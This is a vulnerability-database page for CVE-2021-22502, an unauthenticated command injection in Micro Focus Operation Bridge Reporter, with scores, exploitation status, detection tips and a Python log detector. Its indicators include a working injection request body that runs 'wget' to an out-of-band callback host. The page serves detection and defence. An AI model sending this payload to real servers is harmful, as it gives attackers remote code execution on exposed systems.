CVE-2021-22502
published 2021-02-08

Priority: P197 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2021-11-17
Exploited in the wild
EPSS: 96.74% (99.9th percentile)
Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.

Affected

1 range

Vendor | Product | Version range | Fixed in
microfocus | operation_bridge_reporter | |

Detection & IOCs (extracted from sources)

url: /AdminService/urest/v1/LogonResource
command: {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"}
  • Look for POST requests to /AdminService/urest/v1/LogonResource with backtick-enclosed shell commands embedded in the 'userName' JSON field — this is the injection point and requires no authentication.
  • The server returns HTTP 401 with body containing 'An error occurred' and 'AUTHENTICATION_FAILED' even on a successful injection attempt — a 401 response does NOT rule out exploitation.
  • The injection occurs at the login endpoint before authentication; monitor for shell metacharacters (backticks, $(), pipes) inside the 'userName' field of JSON bodies sent to the LogonResource endpoint.
  • Response Content-Type header will be 'application/json' — use this alongside the 401 status and error body strings to fingerprint exploitation attempts.
  • Vulnerability affects OBR version 10.40 and below; older versions may also be affected — confirm exact version scope before scoping detection.
  • The Metasploit module and Nuclei template were tested specifically on the Linux 10.40 version; Windows deployments may behave differently.
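
The checks listed above, as an added Python example (not taken from the page's sources or from any vendor tooling): it flags POST requests to the LogonResource endpoint whose JSON userName contains a backtick, `$(` or a pipe, and keeps the hit whatever the response status was. The record layout and the sample requests are constructed for illustration.

```python
import json
import re

# Endpoint and field named on the page; everything else here is constructed.
LOGON_PATH = "/AdminService/urest/v1/LogonResource"
# Metacharacters the page lists for the userName field: backticks, $(), pipes.
SHELL_META = re.compile(r"`|\$\(|\|")


def check_request(method, path, body, status=None):
    """Return a finding dict when a request matches the page's indicators, else None."""
    if method.upper() != "POST":
        return None
    if path.split("?", 1)[0].rstrip("/") != LOGON_PATH:
        return None
    try:
        user = json.loads(body).get("userName")
    except (ValueError, AttributeError, TypeError):
        return None  # body is not a JSON object; out of scope for this check
    if not isinstance(user, str):
        return None
    hits = sorted(set(SHELL_META.findall(user)))
    if not hits:
        return None
    # The status is recorded but never used to dismiss a hit: per the page,
    # the server answers 401 AUTHENTICATION_FAILED even when injection worked.
    return {"userName": user, "metachars": hits, "status": status}


# Constructed sample records: (method, path, JSON body, response status).
SAMPLES = [
    ("POST", LOGON_PATH, '{"userName":"admin","credential":"pw"}', 401),
    ("POST", LOGON_PATH,
     '{"userName":"something `wget {{interactsh-url}}`","credential":"whatever"}', 401),
    ("POST", LOGON_PATH, '{"userName":"a$(placeholder)","credential":"x"}', 401),
    ("GET", LOGON_PATH, "", 405),
    ("POST", "/AdminService/other", '{"userName":"`x`"}', 404),
]


def scan(records):
    """Return the findings for every record that matches."""
    return [f for f in (check_request(*r) for r in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```
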

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck | | 9.8 | CRITICAL |
cisa | | 9.8 | CRITICAL |